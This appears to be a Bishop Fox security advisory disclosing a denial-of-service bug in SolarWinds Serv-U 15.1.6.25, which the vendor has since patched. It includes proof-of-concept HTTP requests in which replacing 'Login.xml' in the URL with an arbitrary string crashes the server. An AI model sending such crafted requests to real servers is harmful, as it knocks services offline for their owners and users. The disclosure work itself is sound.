Reported Date
January 8, 2018
Vendor
SolarWinds
Systems Affected
Serv-U 15.1.6.25
Summary
A denial-of-service vulnerability in SolarWinds Serv-U 15.1.6.25 allows an authenticated user to crash the application (with a NULL pointer dereference) via a specially crafted URL beginning with the /Web%20Client/ substring.
Vendor Status
The vendor has been notified of this vulnerability, and has patched the software as of version 15.1.6 HFv1.
Exploit Availability
An authenticated user can request a specially crafted URL from the Serv-U MFT server that will result in a null pointer dereference. By changing the Login.xml string in the URL of an authentication request to an arbitrary value, an attacker can cause the application to crash. An ordinary login request is shown below:
POST /Web%20Client/Login.xml?Command=Login&Sync=1514397954014 HTTP/1.1 Host: 127.0.0.1 Connection: close …omitted for brevity… Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS
user=testuser&pword=password&viewshare=&language=en%2CUS&
In this proof of concept, Login.xml was replaced with the string crash, as pictured below:
POST /Web%20Client/crash?Command=Login&Sync=1514397954014 HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 59 …omitted for brevity… Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS
user=testuser&pword=password&viewshare=&language=en%2CUS&
The Serv-U tray immediately displayed a pop-up notification stating that the Serv-U MFT server was offline. Shortly thereafter, an error message was displayed within the Serv-U Management Console, as seen below:
The Management Console was otherwise unresponsive, and the Serv-U MFT server had to be manually restarted following this crash.
Researcher
Baker Hamilton, MD, MMSc of Bishop Fox
For Reference
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.
